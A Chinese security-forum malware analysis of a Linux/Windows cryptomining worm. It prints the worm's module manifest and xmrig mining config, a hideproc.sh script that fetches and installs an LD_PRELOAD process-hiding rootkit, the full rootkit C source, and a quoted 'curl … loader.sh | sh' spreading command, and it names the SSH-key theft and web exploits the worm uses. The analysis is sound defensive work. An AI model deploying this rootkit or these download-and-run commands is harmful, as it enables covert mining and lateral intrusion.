首页
社区
课程
招聘
[原创]关于双系统挖矿,新型AutoUpdate挖矿病毒的分析与讨论
发表于: 2021-7-12 20:23 15244

[原创]关于双系统挖矿,新型AutoUpdate挖矿病毒的分析与讨论

2021-7-12 20:23
15244

参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
上周末看到了深信服千里目的病毒分析报告,顿时眼睛一亮,这种集合了Windows&&Linux&&Web流量攻击的恶意程序既考察了分析人员的知识广度,又给目前安全形势带来了严峻的考验。同时也让我觉得其实二进制与web之间的关系又近了一步。全栈并不是那么遥不可及!

upx脱壳后,发现go样本,找到main函数,定位到网络连接

域名+请求文件全都明文存储在文件中

放样本跑起来,查看输出(该程序大概功能会检查恶意程序的相关模块,根据系统信息下载对应缺失模块)

请求文件,可以看到病毒作者很人性化,还为我们专门定制了双平台的攻击模块http://m.windowsupdatesupport.org/d/windowsupdatev1.json

我们以main函数中的网络请求之前下断,由此入手调试

地址下断b *0x6681ef,查看后续行为

不错!崩溃了(舰长,很有精神!),每次调试gdb都会崩溃。不浪费时间,换一种调试思路。(补充:下回试试 ltrace和strace)
tcpdump抓包,通过分析流量把该程序后续行为补全,导出http对象

好家伙都给老子下全了,剩下的我们逐个分析


(嚯,好家伙,ubuntu上给我下个pe,nbnb!!你是不是还得给我装个wine?)

二话不多说,火绒剑&&procmon,对症下药

(哟!这程序莫不是被我吓坏了?在我淫威之下屈服了?那老子就看看,不进去)
拖入ida,提示我们缺失dll库(问号脸?_?)

找到动态调用该模块的地方

根据以往经验,大概率挖矿程序都是魔改或梭哈的github开源项目,执行使用strings把字符串全dump出来,找到如下配置文件

再从github上搜一搜,终于让我找到了宁的前身
https://github.com/xmrig/xmrig
作者为了防止被认出,还专门把相关指纹替换了一遍(不错,真tm用心良苦)


实际上,xmmrig.com这个域名根本不存在!
该程序会帮宁安装挖矿所缺失的一切组件,真tm替客户着想!!!

dbus程序前身为github上xmrig挖矿的开源项目

下载processhider.c模块,编译并替换掉/usr/local/lib/libc2.28.so,并添加到/etc/ld.so.preload中,由此再运行的程序都会优先加载preload中的模块

将上述进程 kworkers | dbus | autoupdate 过滤掉,从而达到隐藏进程的目的


(好家伙,上来就先把同行们和挖矿进程都干掉。。。果然搞tm病毒也内卷,赶快收集一波,以后应急先把这脚本跑一遍)

查询出口ip,查询本地ssh私钥和pem证书文件,最后通过查询knownhost查看连接过的主机

最后通过收集到的私钥连接其他机器使其下载loader.sh进行蠕虫式传播,自此也成就闭环

具备横传能力,危险系数高

(声明,本人对web洞及java研究不深,如有错误,欢迎探讨)

首先upx脱壳,好家伙,又一个go程序,查看导出表(找到了大宝藏)


这些main类中的扫描模块,我们一个一个看(当然,攻击模块还有很多,我就不献丑了)

xxljob (弱密码登后台?)
这个无法确定是哪个洞,一开始我以为是XXL-JOB executor未授权。。但始终没找到相关json串

mongo-express远程代码执行漏洞(CVE-2019-10758)
相关链接:https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/

shiro反序列化(cve-2016-4437)
相关链接:https://vulhub.org/#/environments/shiro/CVE-2016-4437/

tomcat密码爆破
(这个以前玩过,哈哈哈)

seeyon(致远OA远程代码执行漏洞)
相关链接:https://mrxn.net/news/620.html

seeyon(致远OA任意文件上传)
相关链接:https://www.cnblogs.com/sketchpl4ne/p/14515113.html

泛微oa(远程代码执行)
相关链接:https://blog.csdn.net/qq_41757280/article/details/101198845

用友oa(远程命令执行)
相关链接:https://blog.csdn.net/m0_58434634/article/details/117547164

docker daemon api 未授权访问
相关链接:
https://vulhub.org/#/environments/docker/unauthorized-rce/

structs2(包括S008\S013\S015\S016\S045\S046\S057)


jenkin插件远程代码执行(不确定)

weblogic console接口远程代码执行漏洞

fastjson 1.2.47远程命令执行

找到main.DownLoadFile函数,交叉引用
下载dubbo.jar模块

下载dubbo.jar对应的攻击参数


可以看到dubbo.jar配置文件中执行的命令为
curl httlp://m.windowsupdatesupport.org/d/loader.sh | sh横向传播,即通过已知的web漏洞进行横向传播

反编译该程序发现包括快速检测和exp(攻击模块)

执行的参数如上

至此,病毒就分析到这里了,这个样本覆盖的知识面相当全面,拿来练手再合适不过。最近两年针对企业端服务器的各种木马越来越多,二进制与web之间的鸿沟也越来越近,希望各位安全员们以此为戒,全面发展才是未来的出路
参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw

#题外话
最近在找工作,希望以此抛砖引玉,找到份自己心怡的工作,工作地点(北京、天津)感谢!!
web新手,文章若分析有误欢迎共同探讨

{
  "linux": [{
    "filename": "download",
    "handle": "download",
    "url": "/download",
    "ver": "20210002"
  },{
    "filename": "dbus",
    "handle": "downrun",
    "url": "/dbus",
    "ver": "20210002"
  },{
    "filename": "hideproc.sh",
    "handle": "downrun",
    "url": "/hideproc.sh",
    "ver": "20210002"
  },{
    "filename": "sshkey.sh",
    "handle": "downrun",
    "url": "/sshkey.sh",
    "ver": "20210002"
  },{
    "filename": "autoupdate",
    "handle": "downrun",
    "url": "/autoupdate",
    "ver": "20210012"
  },{
    "filename": "kworkers",
    "handle": "update",
    "url": "/kworkers",
    "ver": "20210008"
  }
  ],
  "windows": [{
    "filename": "service.exe",
    "handle": "update",
    "url": "/service.exe",
    "ver": "20210008"
  },{
    "filename": "inj.exe",
    "handle": "download",
    "url": "/inj.exe",
    "ver": "20210003"
  },{
    "filename": "runtime.dll",
    "handle": "download",
    "url": "/runtime.dll",
    "ver": "20210003"
  },{
    "filename": "autoupdate.exe",
    "handle": "downrun",
    "url": "/autoupdate.exe",
    "ver": "20210012"
  },{
    "filename": "updater.exe",
    "handle": "downrun",
    "url": "/updater.exe",
    "ver": "20210003"
  }]
}
{
  "linux": [{
    "filename": "download",
    "handle": "download",
    "url": "/download",
    "ver": "20210002"
  },{
    "filename": "dbus",
    "handle": "downrun",
    "url": "/dbus",
    "ver": "20210002"
  },{
    "filename": "hideproc.sh",
    "handle": "downrun",
    "url": "/hideproc.sh",
    "ver": "20210002"
  },{
    "filename": "sshkey.sh",
    "handle": "downrun",
    "url": "/sshkey.sh",
    "ver": "20210002"
  },{
    "filename": "autoupdate",
    "handle": "downrun",
    "url": "/autoupdate",
    "ver": "20210012"
  },{
    "filename": "kworkers",
    "handle": "update",
    "url": "/kworkers",
    "ver": "20210008"
  }
  ],
  "windows": [{
    "filename": "service.exe",
    "handle": "update",
    "url": "/service.exe",
    "ver": "20210008"
  },{
    "filename": "inj.exe",
    "handle": "download",
    "url": "/inj.exe",
    "ver": "20210003"
  },{
    "filename": "runtime.dll",
    "handle": "download",
    "url": "/runtime.dll",
    "ver": "20210003"
  },{
    "filename": "autoupdate.exe",
    "handle": "downrun",
    "url": "/autoupdate.exe",
    "ver": "20210012"
  },{
    "filename": "updater.exe",
    "handle": "downrun",
    "url": "/updater.exe",
    "ver": "20210003"
  }]
}
"api": {
     "id": null,
     "worker-id": null
 },
 "http": {
     "enabled": true,
     "host": "127.0.0.1",
     "port": 61254,
     "access-token": null,
     "restricted": true
 },
 "autosave": true,
 "background": true,
 "colors": true,
 "title": true,
 "randomx": {
     "init": -1,
     "init-avx2": -1,
     "mode": "auto",
     "1gb-pages": false,
     "rdmsr": true,
     "wrmsr": true,
     "cache_qos": false,
     "numa": true,
     "scratchpad_prefetch_mode": 1
 },
 "cpu": {
     "enabled": true,
     "cpu-affinity":3,
     "threads":3,
     "huge-pages": true,
     "huge-pages-jit": false,
     "hw-aes": null,
     "priority": null,
     "memory-pool": false,
     "yield": true,
     "max-threads-hint": 50,
     "asm": true,
     "argon2-impl": null,
     "astrobwt-max-size": 550,
     "astrobwt-avx2": false,
     "cn/0": false,
     "cn-lite/0": false
 },
 "opencl": {
     "enabled": false,
     "cache": true,
     "loader": null,
     "platform": "AMD",
     "adl": true,
     "cn/0": false,
     "cn-lite/0": false
 },
 "cuda": {
     "enabled": false,
     "loader": null,
     "nvml": true,
     "cn/0": false,
     "cn-lite/0": false
 },
 "donate-level": 0,
 "donate-over-proxy":0 ,
 "log-file": null,
 "pools": [
     {
         "algo": null,
         "coin": null,
         "url": "m.windowsupdatesupport.org:443",
         "user": "x",
         "pass": "x",
         "rig-id": null,
         "nicehash": true,
         "keepalive": false,
         "enabled": true,
         "tls": true,
         "tls-fingerprint": null,
         "daemon": false,
         "socks5": null,
         "self-select": null,
         "submit-to-origin": false
     }
 ],
 "print-time": 60,
 "health-print-time": 60,
 "dmi": true,
 "retries": 5,
 "retry-pause": 5,
 "syslog": false,
 "tls": {
     "enabled": true,
     "protocols": null,
     "cert": null,
     "cert_key": null,
     "ciphers": null,
     "ciphersuites": null,
     "dhparam": null
 },
 "user-agent": null,
 "verbose": 0,
 "watch": true,
 "pause-on-battery": false,
 "pause-on-active": false
"api": {
     "id": null,
     "worker-id": null
 },
 "http": {
     "enabled": true,
     "host": "127.0.0.1",
     "port": 61254,
     "access-token": null,
     "restricted": true
 },
 "autosave": true,
 "background": true,
 "colors": true,
 "title": true,
 "randomx": {
     "init": -1,
     "init-avx2": -1,
     "mode": "auto",
     "1gb-pages": false,
     "rdmsr": true,
     "wrmsr": true,
     "cache_qos": false,
     "numa": true,
     "scratchpad_prefetch_mode": 1
 },
 "cpu": {
     "enabled": true,
     "cpu-affinity":3,
     "threads":3,
     "huge-pages": true,
     "huge-pages-jit": false,
     "hw-aes": null,
     "priority": null,
     "memory-pool": false,
     "yield": true,
     "max-threads-hint": 50,
     "asm": true,
     "argon2-impl": null,
     "astrobwt-max-size": 550,
     "astrobwt-avx2": false,
     "cn/0": false,
     "cn-lite/0": false
 },
 "opencl": {
     "enabled": false,
     "cache": true,
     "loader": null,
     "platform": "AMD",
     "adl": true,
     "cn/0": false,
     "cn-lite/0": false
 },
 "cuda": {
     "enabled": false,
     "loader": null,
     "nvml": true,
     "cn/0": false,
     "cn-lite/0": false
 },
 "donate-level": 0,
 "donate-over-proxy":0 ,
 "log-file": null,
 "pools": [
     {
         "algo": null,
         "coin": null,
         "url": "m.windowsupdatesupport.org:443",
         "user": "x",
         "pass": "x",
         "rig-id": null,
         "nicehash": true,
         "keepalive": false,
         "enabled": true,
         "tls": true,
         "tls-fingerprint": null,
         "daemon": false,
         "socks5": null,
         "self-select": null,
         "submit-to-origin": false
     }
 ],
 "print-time": 60,
 "health-print-time": 60,
 "dmi": true,
 "retries": 5,
 "retry-pause": 5,
 "syslog": false,
 "tls": {
     "enabled": true,
     "protocols": null,
     "cert": null,
     "cert_key": null,
     "ciphers": null,
     "ciphersuites": null,
     "dhparam": null
 },
 "user-agent": null,
 "verbose": 0,
 "watch": true,
 "pause-on-battery": false,
 "pause-on-active": false
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
else
  if [ `grep libc2.28 /etc/ld.so.preload`  ]
  then echo "hideproc already done!!"
  else
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools"  -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o  processhider.c
 
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload  || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
    ls >/tmp/.1  2>&1
    grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload
  fi
fi
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
else
  if [ `grep libc2.28 /etc/ld.so.preload`  ]
  then echo "hideproc already done!!"
  else
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools"  -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o  processhider.c
 
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload  || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
    ls >/tmp/.1  2>&1
    grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload
  fi
fi
#define _GNU_SOURCE
 
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
 
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "kworkers|dbus|autoupdate";
 
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }
 
    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }
 
    buf[ret] = 0;
    return 1;
}
 
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }
 
    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
 
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }
 
    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }
 
    fclose(f);
 
    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}
 
#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);               \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strstr( process_to_filter,process_name)) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}
 
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
#define _GNU_SOURCE
 
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
 
/*
 * Every process with this name will be excluded
 */

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 8
支持
分享
最新回复 (3)
雪    币: 1376
活跃值: (5604)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
2
6666666666
2021-7-13 17:31
0
雪    币: 415
活跃值: (2633)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
666
2021-7-14 11:28
0
雪    币: 3499
活跃值: (795)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
4
作者邮箱 n9nenacel@gmail.com
2021-7-16 19:42
0
游客
登录 | 注册 方可回帖
返回
//